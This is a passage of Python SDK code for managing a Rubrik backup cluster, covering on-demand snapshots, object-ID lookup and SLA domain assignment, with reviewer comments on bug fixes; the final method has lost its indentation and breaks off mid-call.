def on_demand_snapshot(self, object_name, object_type, sla_name='current', fileset=None, host_os=None, sql_host=None, sql_instance=None, sql_db=None, hostname=None, force_full=False, share_type=None, timeout=15):  # pylint: ignore
    """Initiate an on-demand snapshot.

    Arguments:
        object_name {str} -- The name of the Rubrik object to take a on-demand snapshot of.
        object_type {str} -- The Rubrik object type you want to backup. (choices: {vmware, physical_host, ahv, mssql_db, oracle_db, share})

    Keyword Arguments:
        sla_name {str} -- The SLA Domain name you want to assign the on-demand snapshot to. By default, the currently assigned SLA Domain will be used. (default: {'current'})
        fileset {str} -- The name of the Fileset you wish to backup. Only required when taking a on-demand snapshot of a physical host or share. (default: {'None'})
        host_os {str} -- The operating system for the physical host. Only required when taking a on-demand snapshot of a physical host. (default: {'None'}) (choices: {Linux, Windows})
        sql_host {str} -- The name of the MSSQL host. Only required when the object_type is mssql_db. (default: {None})
        sql_instance {str} -- The name of the MSSQL instance. Only required when the object_type is mssql_db. (default: {None})
        sql_db {str} -- The name of the MSSQL database. Only required when the object_type is mssql_db. (default: {None})
        hostname {str} -- Required when the object_type is either oracle_db or share. When oracle_db is the object_type, this argument corresponds to the host name, or one of those host names in the cluster that the Oracle database is running. When share is the object_type this argument corresponds to the NAS server host name.
        force_full {bool} -- If True will force a new full image backup of an Oracle database. (default: {False})
        share_type {str} -- The type of NAS share i.e. NFS or SMB. Only required when taking a snapshot of a Share.
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        tuple -- When object_type is vmware, the full API response for `POST /v1/vmware/vm/{ID}/snapshot` and the job status URL which can be used to monitor progress of the snapshot. (api_response, job_status_url)
        tuple -- When object_type is physical_host, the full API response for `POST /v1/fileset/{}/snapshot` and the job status URL which can be used to monitor progress of the snapshot. (api_response, job_status_url)
    """
    # Record the public entry point so nested object_id() calls log under it.
    self.function_name = inspect.currentframe().f_code.co_name

    valid_object_type = ['vmware', 'physical_host',
                         'ahv', 'mssql_db', 'oracle_db', 'share']
    valid_host_os_type = ['Linux', 'Windows']

    # Input validation: object_type always, host_os only when supplied.
    if object_type not in valid_object_type:
        raise InvalidParameterException("The on_demand_snapshot() `object_type` argument must be one of the following: {}.".format(
            valid_object_type))

    if host_os is not None:
        if host_os not in valid_host_os_type:
            raise InvalidParameterException("The on_demand_snapshot() `host_os` argument must be one of the following: {}.".format(
                valid_host_os_type))

    if object_type == 'vmware':
        # Resolve the VM id, then the SLA id (current assignment or by name),
        # and POST the snapshot request.
        self.log("on_demand_snapshot: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
            object_name))
        vm_id = self.object_id(object_name, object_type, timeout=timeout)

        if sla_name == 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the vSphere VM '{}'.".format(object_name))
            vm_summary = self.get(
                'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
            sla_id = vm_summary['effectiveSlaDomainId']
        elif sla_name != 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
            sla_id = self.object_id(sla_name, 'sla', timeout=timeout)

        config = {}
        config['slaId'] = sla_id

        self.log("on_demand_snapshot: Initiating snapshot for the vSphere VM '{}'.".format(
            object_name))
        api_request = self.post(
            'v1', '/vmware/vm/{}/snapshot'.format(vm_id), config, timeout)

        # First link in the response is the async job-status URL.
        snapshot_status_url = api_request['links'][0]['href']

    elif object_type == 'ahv':
        # Same flow as vmware, but against the internal Nutanix endpoints.
        self.log("on_demand_snapshot: Searching the Rubrik cluster for the AHV VM '{}'.".format(
            object_name))
        vm_id = self.object_id(object_name, object_type, timeout=timeout)

        if sla_name == 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the AHV VM '{}'.".format(object_name))
            vm_summary = self.get(
                'internal', '/nutanix/vm/{}'.format(vm_id), timeout)
            sla_id = vm_summary['effectiveSlaDomainId']

        elif sla_name != 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
            sla_id = self.object_id(sla_name, 'sla', timeout=timeout)

        config = {}
        config['slaId'] = sla_id

        self.log("on_demand_snapshot: Initiating snapshot for the AHV VM '{}'.".format(
            object_name))
        api_request = self.post(
            'internal', '/nutanix/vm/{}/snapshot'.format(vm_id), config, timeout)

        snapshot_status_url = api_request['links'][0]['href']

    elif object_type == 'mssql_db':
        # Walk host -> instance -> database to find the db id.
        self.log(
            "on_demand_snapshot: Searching the Rubrik cluster for the MS SQL '{}'.".format(object_name))
        mssql_host = self.object_id(
            sql_host, 'physical_host', timeout=timeout)
        mssql_instance = self.get(
            'v1', '/mssql/instance?primary_cluster_id=local&root_id={}'.format(mssql_host), timeout)
        # NOTE(review): if `sql_instance` (or `sql_db` below) is not found in
        # the returned data, sql_db_id / mssql_id are never bound and the
        # following calls raise NameError — confirm and add validation.
        for instance in mssql_instance['data']:
            if instance['name'] == sql_instance:
                sql_db_id = instance['id']
                mssql_db = self.get(
                    'v1', '/mssql/db?primary_cluster_id=local&instance_id={}'.format(sql_db_id), timeout)
                for db in mssql_db['data']:
                    if db['name'] == sql_db:
                        mssql_id = db['id']

        if sla_name == 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the MS SQL '{}'.".format(object_name))
            mssql_summary = self.get(
                'v1', '/mssql/db/{}'.format(mssql_id), timeout)
            sla_id = mssql_summary['effectiveSlaDomainId']

        elif sla_name != 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
            sla_id = self.object_id(sla_name, 'sla', timeout=timeout)

        config = {}
        config['slaId'] = sla_id

        self.log("on_demand_snapshot: Initiating snapshot for the MS SQL '{}'.".format(
            object_name))
        api_request = self.post(
            'v1', '/mssql/db/{}/snapshot'.format(mssql_id), config, timeout)

        snapshot_status_url = api_request['links'][0]['href']

    elif object_type == 'physical_host':
        # Physical hosts are backed up via a Fileset, so both host_os and
        # fileset are mandatory for this branch.
        if host_os is None:
            raise InvalidParameterException(
                "The on_demand_snapshot() `host_os` argument must be populated when taking a Physical host snapshot.")
        elif fileset is None:
            raise InvalidParameterException(
                "The on_demand_snapshot() `fileset` argument must be populated when taking a Physical host snapshot.")

        self.log("on_demand_snapshot: Searching the Rubrik cluster for the Physical Host '{}'.".format(
            object_name))
        host_id = self.object_id(object_name, object_type, timeout=timeout)

        self.log(
            "on_demand_snapshot: Searching the Rubrik cluster for the Fileset Template '{}'.".format(fileset))
        fileset_template_id = self.object_id(
            fileset, 'fileset_template', host_os, timeout=timeout)

        self.log(
            "on_demand_snapshot: Searching the Rubrik cluster for the full Fileset.")
        api_endpoint = '/fileset?primary_cluster_id=local&host_id={}&is_relic=false&template_id={}'.format(
            host_id, fileset_template_id)
        fileset_summary = self.get('v1', api_endpoint, timeout=timeout)

        # total == 0 means the template is not assigned to this host.
        if fileset_summary['total'] == 0:
            raise InvalidParameterException(
                "The Physical Host '{}' is not assigned to the '{}' Fileset.".format(
                    object_name, fileset))

        fileset_id = fileset_summary['data'][0]['id']

        if sla_name == 'current':
            sla_id = fileset_summary['data'][0]['effectiveSlaDomainId']
        elif sla_name != 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
            sla_id = self.object_id(sla_name, 'sla', timeout=timeout)

        config = {}
        config['slaId'] = sla_id

        self.log("on_demand_snapshot: Initiating snapshot for the Physical Host '{}'.".format(
            object_name))
        api_request = self.post(
            'v1', '/fileset/{}/snapshot'.format(fileset_id), config, timeout)

        snapshot_status_url = api_request['links'][0]['href']

    elif object_type == 'oracle_db':
        # Oracle lookups require a hostname (or RAC cluster / member name).
        if hostname is None:
            raise InvalidParameterException(
                "You must provide the host or one of the hosts in a RAC cluster for the Oracle DB object.")

        self.log(
            "on_demand_snapshot: Searching the Rubrik cluster for the Oracle database '{}' on the host '{}'.".format(
                object_name,
                hostname))
        db_id = self.object_id(
            object_name, object_type, hostname=hostname, timeout=timeout)

        if sla_name == 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the Oracle database '{}'.".format(
                    object_name))
            oracle_db_summary = self.get(
                'internal', '/oracle/db/{}'.format(db_id), timeout)
            sla_id = oracle_db_summary['effectiveSlaDomainId']

        elif sla_name != 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
            sla_id = self.object_id(sla_name, 'sla', timeout=timeout)

        config = {}
        config['slaId'] = sla_id
        # Oracle additionally supports forcing a full (level-0) backup.
        config['forceFullSnapshot'] = force_full

        self.log("on_demand_snapshot: Initiating snapshot for the Oracle database '{}'.".format(
            object_name))
        api_request = self.post(
            'internal', '/oracle/db/{}/snapshot'.format(db_id), config, timeout)

        snapshot_status_url = api_request['links'][0]['href']

    elif object_type == 'share':
        # NAS shares are backed up via a Fileset attached to the share, so
        # hostname, fileset and share_type are all mandatory here.
        if hostname is None:
            raise InvalidParameterException(
                "The on_demand_snapshot() `hostname` argument must be populated when taking a NAS Share fileset snapshot.")
        elif fileset is None:
            raise InvalidParameterException(
                "The on_demand_snapshot() `fileset` argument must be populated when taking a NAS Share fileset snapshot.")
        elif share_type is None:
            raise InvalidParameterException(
                "The on_demand_snapshot() `share_type` argument must be populated when taking a NAS Share fileset snapshot.")

        self.log(
            "on_demand_snapshot: Searching the Rubrik cluster for the NAS Host '{}'.".format(hostname))
        host_id = self.object_id(
            hostname, 'physical_host', timeout=timeout)

        self.log("on_demand_snapshot: Searching the Rubrik cluster for the NAS share '{}'.".format(
            object_name))
        share_id = self.object_id(
            object_name, 'share', hostname=hostname, share_type=share_type, timeout=timeout)

        self.log(
            "on_demand_snapshot: Searching the Rubrik cluster for the full Fileset.")
        api_endpoint = '/fileset?share_id={}&host_id={}&is_relic=false&name={}'.format(
            share_id, host_id, fileset)
        fileset_summary = self.get('v1', api_endpoint, timeout=timeout)

        if fileset_summary['total'] == 0:
            raise InvalidParameterException(
                "The NAS Share '{}' is not assigned to the '{}' Fileset.".format(
                    object_name, fileset))

        fileset_id = fileset_summary['data'][0]['id']

        if sla_name == 'current':
            sla_id = fileset_summary['data'][0]['effectiveSlaDomainId']
        elif sla_name != 'current':
            self.log(
                "on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
            sla_id = self.object_id(sla_name, 'sla', timeout=timeout)

        config = {}
        config['slaId'] = sla_id

        self.log(
            "on_demand_snapshot: Initiating snapshot for the NAS Share '{}' Fileset '{}'.".format(
                object_name, fileset))
        api_request = self.post(
            'v1', '/fileset/{}/snapshot'.format(fileset_id), config, timeout)

        snapshot_status_url = api_request['links'][0]['href']

    # Return the raw API response plus the async job-status URL.
    return (api_request, snapshot_status_url)
def object_id(self, object_name, object_type, host_os=None, hostname=None, share_type=None, mssql_host=None, mssql_instance=None, timeout=15):
    """Get the ID of a Rubrik object by providing its name.

    Arguments:
        object_name {str} -- The name of the Rubrik object whose ID you wish to lookup.
        object_type {str} -- The object type you wish to look up. (choices: {vmware, sla, vmware_host, physical_host, fileset_template, managed_volume, mssql_db, mssql_instance, mssql_availability_group, vcenter, ahv, aws_native, oracle_db, oracle_host, volume_group, archival_location, share, organization, organization_role_id, organization_admin_role})

    Keyword Arguments:
        host_os {str} -- The operating system for the host. Required when object_type is 'fileset_template'. (default: {None}) (choices: {Windows, Linux})
        hostname {str} -- The Oracle hostname, Oracle RAC cluster name, or one of the hostnames in the Oracle RAC cluster. Required when the object_type is oracle_db or share. Using the IP is not supported.
        share_type {str} -- The type of NAS share i.e. NFS or SMB
        mssql_host {str} -- The name of a MSSQL Host. Required when the object_type is mssql_db or mssql_instance.
        mssql_instance {str} -- The name of a MSSQL database instance. Required when the object_type is mssql_db.
        timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        str -- The ID of the provided Rubrik object.

    Raises:
        InvalidParameterException -- When validation fails, no object matches,
            or more than one object matches the provided name.
    """
    # Record the public entry point for logging unless a caller higher in the
    # stack (e.g. on_demand_snapshot) has already set it.
    if self.function_name == "":
        self.function_name = inspect.currentframe().f_code.co_name

    valid_object_type = [
        'vmware',
        'sla',
        'vmware_host',
        'physical_host',
        'fileset_template',
        'managed_volume',
        'mssql_db',
        'mssql_instance',
        'mssql_availability_group',
        'vcenter',
        'ahv',
        'aws_native',
        'oracle_db',
        'oracle_host',
        'volume_group',
        'archival_location',
        'share',
        'organization',
        'organization_role_id',
        'organization_admin_role']

    if object_type not in valid_object_type:
        raise InvalidParameterException("The object_id() object_type argument must be one of the following: {}.".format(
            valid_object_type))

    if object_type == 'fileset_template':
        if host_os is None:
            raise InvalidParameterException(
                "You must provide the Fileset Template OS type.")
        elif host_os not in ['Linux', 'Windows']:
            raise InvalidParameterException(
                "The host_os must be either 'Linux' or 'Windows'.")

    if object_type == 'sla':
        # 'Forever' / 'Unprotected' map to the reserved UNPROTECTED id and
        # never need an API lookup.
        if object_name.upper() == "FOREVER" or object_name.upper() == "UNPROTECTED":
            return "UNPROTECTED"

    if object_type == 'oracle_db':
        if hostname is None:
            raise InvalidParameterException(
                "You must provide the hostname, the RAC cluster name, or one of the hosts in the RAC cluster for the Oracle DB object.")
        # Reject IP addresses — Oracle lookups match on hostnames only.
        # BUG FIX: the previous pattern was a single string literal wrapped
        # across several source lines, which embedded literal newlines and
        # indentation into the regex so it could never match a real
        # dotted-quad address and the guard below was dead.
        regex = (r'^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.'
                 r'(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.'
                 r'(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.'
                 r'(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)$')
        if re.search(regex, hostname):
            raise InvalidParameterException(
                "You must provide the hostname, RAC cluster name or one of the hosts in a RAC cluster for the Oracle DB object. Using an IP address is not supported.")
        # Hostnames may be stored with or without a domain suffix; compare on
        # the short name for a consistent match.
        hostname = hostname.split('.')[0]

    if object_type == 'share':
        if hostname is None:
            raise InvalidParameterException(
                "You must provide the 'hostname' with the NAS share object.")
        if share_type is None:
            raise InvalidParameterException(
                "You must provide the 'share_type' with the NAS share object.")
        else:
            # Shares are matched per host, so resolve the host id first.
            self.log('Searching the Rubrik cluster for the host ID.')
            host_id = self.object_id(
                hostname, 'physical_host', timeout=timeout)

    # Map each object type to the endpoint that can filter it by name (or,
    # where the API has no name filter, list candidates for local matching).
    api_call = {
        "vmware": {
            "api_version": "v1",
            "api_endpoint": "/vmware/vm?primary_cluster_id=local&is_relic=false&name={}".format(object_name)
        },
        "sla": {
            "api_version": "v1",
            "api_endpoint": "/sla_domain?primary_cluster_id=local&name={}".format(object_name)
        },
        "vmware_host": {
            "api_version": "v1",
            "api_endpoint": "/vmware/host?primary_cluster_id=local"
        },
        "fileset_template": {
            "api_version": "v1",
            "api_endpoint": "/fileset_template?primary_cluster_id=local&operating_system_type={}&name={}".format(host_os, object_name)
        },
        "managed_volume": {
            "api_version": "internal",
            "api_endpoint": "/managed_volume?is_relic=false&primary_cluster_id=local&name={}".format(object_name)
        },
        "ahv": {
            "api_version": "internal",
            "api_endpoint": "/nutanix/vm?primary_cluster_id=local&is_relic=false&name={}".format(object_name)
        },
        "aws_native": {
            "api_version": "internal",
            "api_endpoint": "/aws/account?name={}".format(object_name)
        },
        "vcenter": {
            "api_version": "v1",
            "api_endpoint": "/vmware/vcenter?primary_cluster_id=local"
        },
        "oracle_db": {
            "api_version": "internal",
            "api_endpoint": "/oracle/db?name={}".format(object_name)
        },
        "oracle_host": {
            "api_version": "internal",
            "api_endpoint": "/oracle/hierarchy/root/children?name={}".format(object_name)
        },
        "volume_group": {
            "api_version": "internal",
            "api_endpoint": "/volume_group?is_relic=false"
        },
        "archival_location": {
            "api_version": "internal",
            "api_endpoint": "/archive/location?name={}".format(object_name)
        },
        "share": {
            "api_version": "internal",
            "api_endpoint": "/host/share?share_type={}".format(share_type)
        },
        "organization": {
            "api_version": "internal",
            "api_endpoint": "/organization?name={}".format(object_name)
        },
        "organization_role_id": {
            "api_version": "internal",
            "api_endpoint": "/organization?name={}".format(object_name)
        },
        "mssql_availability_group": {
            "api_version": "v1",
            "api_endpoint": "/mssql/hierarchy/root/children?has_instances=false&is_clustered=false&is_live_mount=false&limit=51&object_type=MssqlAvailabilityGroup&offset=0&primary_cluster_id=local&snappable_status=Protectable&name={}".format(object_name)
        }
    }

    if object_type == 'physical_host':
        # CDM 5.0 renamed the host name filter from "hostname" to "name".
        if self.minimum_installed_cdm_version(5.0, timeout) is True:
            filter_field_name = "name"
        else:
            filter_field_name = "hostname"

        api_call["physical_host"] = {
            "api_version": "v1",
            "api_endpoint": "/host?primary_cluster_id=local&{}={}".format(filter_field_name, object_name)
        }

    if object_type == 'mssql_instance':
        if mssql_host is None:
            raise InvalidParameterException(
                "You must provide a mssql_host when the object_type is mssql_instance.")

        # root_id is host_id in SQL speak
        root_id = self.object_id(mssql_host, 'physical_host')

        api_call["mssql_instance"] = {
            "api_version": "v1",
            "api_endpoint": "/mssql/instance?primary_cluster_id=local&root_id={}".format(root_id)
        }

    if object_type == 'mssql_db':
        if mssql_instance is None or mssql_host is None:
            raise InvalidParameterException(
                "You must provide a mssql_host and mssql_instance when the object_type is mssql_db.")

        instance_id = self.object_id(
            mssql_instance, "mssql_instance", mssql_host=mssql_host)

        api_call["mssql_db"] = {
            "api_version": "v1",
            "api_endpoint": "/mssql/db?primary_cluster_id=local&is_relic=false&name={}&instance_id={}".format(object_name, instance_id)
        }

    # When looking up the org_admin_role the user should provide the org name
    # as the object_name. We then use that to look up the id for the org and
    # then set that as the "object_type" for the full org_admin_role query
    if object_type == "organization_admin_role":
        self.log(
            "object_id: Getting the ID for the {} organization.".format(object_name))
        org_role_id = self.object_id(
            object_name, "organization_role_id", timeout=timeout)

        api_call["organization_admin_role"] = {
            "api_version": "internal",
            "api_endpoint": "/role/{}/authorization".format(org_role_id)
        }

    self.log("object_id: Getting the object id for the {} object '{}'.".format(
        object_type, object_name))
    api_request = self.get(
        api_call[object_type]["api_version"],
        api_call[object_type]["api_endpoint"],
        timeout=timeout)

    object_ids = []

    if object_type == "organization_admin_role":
        # The authorization endpoint returns a single role, not a list.
        object_ids.append(api_request["roleId"])
    else:
        if api_request['total'] == 0:
            raise InvalidParameterException("The {} object '{}' was not found on the Rubrik cluster.".format(
                object_type, object_name))
        elif api_request['total'] > 0:
            # Pick the response field that carries the "object name" for
            # this type; most types use 'name'.
            if object_type == 'physical_host':
                name_value = filter_field_name
            elif object_type == "volume_group":
                name_value = "hostname"
            elif object_type == 'share':
                name_value = "exportPoint"
            else:
                name_value = 'name'

            for item in api_request['data']:
                if object_type == 'oracle_db':
                    # Match on the standalone host, the RAC cluster name, or
                    # any RAC member host name.
                    if 'standaloneHostName' in item.keys():
                        if hostname == item['standaloneHostName'].split('.')[0]:
                            object_ids.append(item['id'])
                            break
                    elif 'racName' in item.keys():
                        if hostname == item['racName']:
                            object_ids.append(item['id'])
                            break
                        if any(instance['hostName'] == hostname for instance in item['instances']):
                            object_ids.append(item['id'])
                            break
                elif object_type == 'share' and item[name_value] == object_name:
                    # Shares must also belong to the requested host.
                    if item['hostId'] == host_id:
                        object_ids.append(item['id'])
                # BUG FIX: this previously tested `item[name_value].lower()`
                # for truthiness only, appending every organization's roleId
                # and wrongly raising the "Multiple objects" error whenever
                # the name filter fuzzy-matched more than one organization.
                elif object_type == "organization_role_id" and item[name_value].lower() == object_name.lower():
                    object_ids.append(item['roleId'])
                elif item[name_value].lower() == object_name.lower():
                    object_ids.append(item['id'])

    if len(object_ids) > 1:
        raise InvalidParameterException(
            "Multiple {} objects named '{}' were found on the Rubrik cluster. Unable to return a specific object id.".format(object_type, object_name))
    elif len(object_ids) == 0:
        raise InvalidParameterException(
            "The {} object '{}' was not found on the Rubrik cluster.".format(object_type, object_name))
    else:
        return object_ids[0]
def assign_sla(self, object_name, sla_name, object_type, log_backup_frequency_in_seconds=None, log_retention_hours=None, copy_only=None, windows_host=None, nas_host=None, share=None, log_backup_frequency_in_minutes=None, num_channels=4, hostname=None, timeout=30): # pytest: ignore
"""Assign a Rubrik object to an SLA Domain.
Arguments:
object_name {str or list} -- The name of the Rubrik object you wish to assign to an SLA Domain. When the 'object_type' is 'volume_group', the object_name can be a list of volumes.
sla_name {str} -- The name of the SLA Domain you wish to assign an object to. To exclude the object from all SLA assignments use `do not protect` as the `sla_name`. To assign the selected object to the SLA of the next higher level object use `clear` as the `sla_name`.
object_type {str} -- The Rubrik object type you want to assign to the SLA Domain. (choices: {ahv, mssql_host, oracle_host, vmware, volume_group})
Keyword Arguments:
log_backup_frequency_in_seconds {int} -- The MSSQL Log Backup frequency you'd like to specify with the SLA. Required when the `object_type` is `mssql_host`. (default {None})
log_retention_hours {int} -- The MSSQL or Oracle Log Retention frequency you'd like to specify with the SLA. Required when the `object_type` is `mssql_host`, `oracle_db` or 'oracle_host'. (default {None})
copy_only {bool} -- Take Copy Only Backups with MSSQL. Required when the `object_type` is `mssql_host`. (default {None})
windows_host {str} -- The name of the Windows host that contains the relevant volume group. Required when the `object_type` is `volume_group`. (default {None})
nas_host {str} -- The name of the NAS host that contains the relevant share. Required when the `object_type` is `fileset`. (default {None})
share {str} -- The name of the network share a fileset will be created for. Required when the `object_type` is `fileset`. (default {None})
log_backup_frequency_in_minutes {int} - The Oracle Log Backup frequency you'd like to specify with the SLA. Required when the `object_type` is `oracle_db` or `oracle_host`. (default {None})
num_channels {int} - Number of RMAN channels used to backup the Oracle database. Required when the `object_type` is `oracle_host`. (default {"4""})
hostname {str} -- The hostname, or one of the hostnames in a RAC cluster, or the RAC cluster name. Required when the object_type is `oracle_db`. (default {None})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The vSphere VM '`object_name`' is already assigned to the '`sla_name`' SLA Domain.
str -- No change required. The MSSQL Instance '`object_name`' is already assigned to the '`sla_name`' SLA Domain with the following log settings: log_backup_frequency_in_seconds: `log_backup_frequency_in_seconds`, log_retention_hours: `log_retention_hours` and copy_only: `copy_only`
str -- No change required. The Oracle Database '`object_name`' is already assigned to the '`sla_name`' SLA Domain with the following log settings: log_backup_frequency_in_minutes: `log_backup_frequency_in_seconds`, log_retention_hours: `log_retention_hours` and num_channels: `num_channels`.
str -- No change required. The Oracle Host '`object_name`' is already assigned to the '`sla_name`' SLA Domain with the following log settings: log_backup_frequency_in_seconds: `log_backup_frequency_in_seconds`. log_retention_hours: `log_retention_hours`, and num_channels: `num_channels`
str -- No change required. The '`object_name`' volume_group is already assigned to the '`sla_name`' SLA Domain.
dict -- The full API response for `POST /internal/sla_domain/{sla_id}/assign`.
dict -- The full API response for `PATCH /internal/volume_group/{id}`.
dict -- The full API response for `PATCH /internal/oracle/db/{id}.`
dict -- The full API response for `PATCH /internal/oracle/host/{id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = ['vmware', 'mssql_host', 'volume_group',
'fileset', 'ahv', 'oracle_db', 'oracle_host']
if object_type not in valid_object_type:
raise InvalidParameterException(
"The assign_sla() object_type argument must be one of the following: {}.".format(valid_object_type))
if object_type == "mssql_host":
if log_backup_frequency_in_seconds is None or log_retention_hours is None or copy_only is None:
raise InvalidParameterException(
"When the object_type is 'mssql_host' the 'log_backup_frequency_in_seconds', 'log_retention_hours', 'copy_only' paramaters must be populated.")
if object_type == "oracle_host":
if log_backup_frequency_in_minutes is None or log_retention_hours is None or num_channels is None:
raise InvalidParameterException(
"When the object_type is 'oracle_host' the 'log_backup_frequency_in_minutes', 'log_retention_hours', 'num_channels' paramaters must be populated.")
if object_type == "oracle_db":
if log_backup_frequency_in_minutes is None or log_retention_hours is None or num_channels is None or hostname is None:
raise InvalidParameterException(
"When the object_type is 'oracle_db' the 'log_backup_frequency_in_minutes', 'log_retention_hours', 'num_channels' and 'hostname' paramaters must be populated.")
if object_type == "fileset":
if nas_host is None or share is None:
raise InvalidParameterException(
"When the object_type is 'fileset' the 'nas_host' and 'share' paramaters must be populated.")
if object_type == "volume_group":
if not isinstance(object_name, (str, list)):
raise InvalidParameterException(
"When the object_type is 'volume_group', the 'object_name' must be a string or a list.")
if windows_host is None:
raise InvalidParameterException(
"When the object_type is 'volumge_group' the 'windows_host' paramater must be populated.")
else:
if not isinstance(object_name, (str)):
raise InvalidParameterException(
"The object_name must be a string.")
# Determine if 'do not protect' or 'clear' are the SLA Domain Name
do_not_protect_regex = re.findall(
'\\bdo not protect\\b', sla_name, flags=re.IGNORECASE)
clear_regex = re.findall('\\bclear\\b', sla_name, flags=re.IGNORECASE)
if len(do_not_protect_regex) > 0:
sla_id = "UNPROTECTED"
elif len(clear_regex) > 0:
sla_id = 'INHERIT'
else:
self.log(
"assign_sla: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
if object_type == 'vmware':
self.log("assign_sla: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
self.log("assign_sla: Determing the SLA Domain currently assigned to the vSphere VM '{}'.".format(
object_name))
vm_summary = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
if sla_id == vm_summary['configuredSlaDomainId']:
return "No change required. The vSphere VM '{}' is already assigned to the '{}' SLA Domain.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the vSphere VM '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
config['managedIds'] = [vm_id]
return self.post("internal", "/sla_domain/{}/assign".format(sla_id), config, timeout)
elif object_type == 'fileset':
self.log(
"assign_sla: Searching the Rubrik cluster for the NAS host '{}'.".format(nas_host))
host_id = self.object_id(
nas_host, 'physical_host', timeout=timeout)
self.log(
"assign_sla: Searching the Rubrik cluster for the share '{}'.".format(share))
share_summary = self.get(
"internal", '/host/share', timeout=timeout)
share_id = None
for shares in share_summary['data']:
if shares['hostId'] == host_id and shares['exportPoint'] == share:
share_id = shares['id']
if share_id is None:
raise InvalidParameterException(
"The share object'{}' does not exist for host '{}'.".format(
share, nas_host))
self.log("assign_sla: Searching the Rubrik cluster for the fileset '{}' template.".format(
object_name))
fileset_summary = self.get(
"v1", '/fileset?is_relic=false&name={}'.format(object_name), timeout=timeout)
template_id = None
for filesets in fileset_summary['data']:
if filesets['hostId'] == host_id and filesets['name'] == object_name:
template_id = filesets['templateId']
if template_id is None:
raise InvalidParameterException(
"The fileset '{}' template does not exist".format(object_name))
self.log(
"assign_sla: Creating filesets for a network host. Each fileset is a fileset template applied to a host")
bulk = [{
'isPassthrough': False,
'shareId': share_id,
'templateId': template_id
}]
fileset_response = self.post(
"internal", "/fileset/bulk", bulk, timeout)
fileset_id = fileset_response['data'][0]['id']
if sla_id == fileset_summary['data'][0]['configuredSlaDomainId']:
return "No change required. The NAS fileset '{}' is already assigned to the '{}' SLA Domain.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the fileset '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
config['managedIds'] = [fileset_id]
return self.post("internal", "/sla_domain/{}/assign".format(sla_id), config, timeout=180)
elif object_type == 'ahv':
self.log("assign_sla: Searching the Rubrik cluster for the AHV VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
self.log("assign_sla: Determing the SLA Domain currently assigned to the AHV VM '{}'.".format(
object_name))
vm_summary = self.get(
'internal', '/nutanix/vm/{}'.format(vm_id), timeout=timeout)
if sla_id == vm_summary['configuredSlaDomainId']:
return "No change required. The AHV VM '{}' is already assigned to the '{}' SLA Domain.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the AHV VM '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
config['managedIds'] = [vm_id]
return self.post("internal", "/sla_domain/{}/assign".format(sla_id), config, timeout)
elif object_type == 'mssql_host':
host_id = ''
mssql_id = ''
db_sla_lst = []
self.log('Searching the Rubrik cluster for the current hosts.')
current_hosts = self.get(
'v1',
'/host?operating_system_type=Windows&primary_cluster_id=local',
timeout=timeout)
# After 5.0, "hostname" is a deprecated field in the results that are returned in "current_hosts"
if self.minimum_installed_cdm_version(5.0):
current_hosts_name = "name"
else:
current_hosts_name = "hostname"
for rubrik_host in current_hosts['data']:
if rubrik_host[current_hosts_name] == object_name:
host_id = rubrik_host['id']
if(host_id):
self.log("assign_sla: Searching the Rubrik cluster for the MSSQL Instance '{}'.".format(
object_name))
mssql_instances = self.get(
'v1', '/mssql/instance?root_id={}'.format(host_id), timeout=timeout)
for mssql_instance in mssql_instances['data']:
mssql_id = mssql_instance['id']
mssql_instance_name = mssql_instance['name']
self.log(
"assign_sla: Determing the SLA Domain currently assigned to the MSSQL Instance '{}'.".format(mssql_instance_name))
mssql_summary = self.get(
'v1', '/mssql/instance/{}'.format(mssql_id), timeout=timeout)
if (sla_id == mssql_summary['configuredSlaDomainId'] and log_backup_frequency_in_seconds == mssql_summary['logBackupFrequencyInSeconds'] and
log_retention_hours == mssql_summary['logRetentionHours'] and copy_only == mssql_summary['copyOnly']):
return "No change required. The MSSQL Instance '{}' is already assigned to the '{}' SLA Domain with the following log settings:" \
" log_backup_frequency_in_seconds: {}, log_retention_hours: {} and copy_only: {}.".format(
object_name, sla_name, log_backup_frequency_in_seconds, log_retention_hours, copy_only)
else:
self.log(
